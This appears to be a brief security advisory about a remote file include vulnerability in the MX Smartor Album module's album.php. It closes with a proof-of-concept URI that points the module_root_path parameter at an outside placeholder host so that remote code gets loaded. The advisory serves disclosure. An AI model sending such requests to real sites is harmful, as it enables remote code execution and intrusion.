MX Smartor Album Module Album.PHP Remote File Include Vulnerability

MX Smartor Album Module Album.PHP Remote File Include Vulnerability

An attacker can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://www.example.com/modules/mx_smartor/album.php?smartor_mode=album_cat&module_root_path=http://example2.com